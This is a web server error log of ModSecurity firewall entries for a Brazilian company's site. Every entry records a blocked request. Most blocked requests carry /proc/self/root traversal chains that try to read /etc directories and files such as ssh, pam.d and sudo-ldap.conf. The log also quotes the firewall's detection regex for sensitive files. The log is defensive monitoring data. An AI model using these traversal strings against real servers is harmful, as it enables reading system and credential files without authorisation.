[Wed Mar 18 05:36:40.268277 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:44286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkGCmAPhZkrhU8w4k7PQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:41.607419 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:44288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkGda6ubjKNq_cu4ZieAAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:44.095032 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:44298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkHOyqAr6etmhZHNqHlwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:45.439929 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:44314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkHUzinOy1jxa1j4fe_QAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:48.165245 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:44322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkIAkwaGbbGflqUZDdrwAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:49.602383 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:48082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkIfu8EFLIOrSqIpvSiAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:54.319088 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:48090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkJvu8EFLIOrSqIpvSjAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:56.690405 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:48094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkKCmAPhZkrhU8w4k7RAAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:59.085201 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:48102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkK9Y0UrI5A3LftIxizwAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:37:10.710569 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:44992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkNkzinOy1jxa1j4ffCwAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:37:12.038640 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:60022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkONa6ubjKNq_cu4ZiiAAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:37:27.049423 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.228.61:34672] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpkR-oXxyEfFpUF8f85bAAAAUg"]
[Wed Mar 18 05:37:28.227668 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.244.43:49306] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpkSOoXxyEfFpUF8f85bwAAAVg"]
[Wed Mar 18 05:37:48.507246 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:42838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkXOoXxyEfFpUF8f85gQAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:37:57.541903 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:34884] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkZeyqAr6etmhZHNqHrwAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 05:37:58.900760 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:60026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkZuw_le52K8_3pV2tUwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:38:05.235501 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:59182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkbQkwaGbbGflqUZDd0wAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:38:46.232438 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:52116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpklgkwaGbbGflqUZDd-gAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:39:13.388978 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:53944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpksew_le52K8_3pV2tiAAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:39:25.993477 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:33226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkvfu8EFLIOrSqIpvSuQAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:39:37.652237 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:59186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkydY0UrI5A3LftIxjVAAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:38.967746 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:43538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkyvu8EFLIOrSqIpvSuwAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
